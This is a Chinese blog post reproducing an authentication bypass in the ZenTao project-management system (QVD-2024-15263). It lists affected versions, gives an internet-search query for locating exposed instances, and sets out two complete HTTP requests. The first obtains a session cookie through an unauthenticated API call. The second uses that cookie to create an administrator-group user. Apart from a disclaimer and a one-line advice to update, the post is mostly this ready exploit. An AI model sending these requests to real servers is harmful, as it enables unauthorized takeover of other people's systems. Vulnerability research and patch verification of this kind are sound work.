漏洞复现-禅道身份认证绕过漏洞
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!
一:漏洞名称
禅道项目管理系统身份认证绕过漏洞复现(QVD-2024-15263)
二:漏洞描述
禅道是一款跨平台、开源的项目管理软件,具备完善的项目、需求、任务和Bug管理功能,支持团队协作和权限管理,简单易用且灵活定制,适用于各种规模的项目团队。
禅道系统中存在的漏洞使得未经授权的用户能够绕过认证流程,创建管理员账户并接管后台,进而可能导致远程代码执行等严重安全问题,可能引发数据泄露和网络攻击。需要及时修复以确保系统安全。
三:漏洞影响版本
16.x <= 禅道项目管理系统 < 18.12(开源版)
6.x <= 禅道项目管理系统 < 8.12(企业版)
3.x <= 禅道项目管理系统 < 4.12(旗舰版)
四:网络空间测绘查询
hunter app.name="ZenTao 禅道"
Windos环境搭建
https://www.zentao.net/dl/zentao/18.10/ZenTaoPMS-18.10-zbox.win64.exe
五:漏洞复现
POC1:
获取cookie
GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy HTTP/1.1
Host: 127.0.0.1
Content-Length: 0
身份认证绕过漏洞通常是由于系统在处理用户身份验证时存在缺陷或漏洞而导致的。一种常见的原理是在某些API或功能中,系统未能正确地验证用户的身份信息,或者验证机制本身存在缺陷。
POC2:
创建用户
POST /zentao/api.php/v1/users HTTP/1.1
Host: 127.0.0.1
Cookie: zentaosid=第一步获取的cookie;
Content-Length: 83
{"account":"hard","password":"123456Qwe..","realname":"hard","role":"","group":"2"}
六:批量检测
七:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果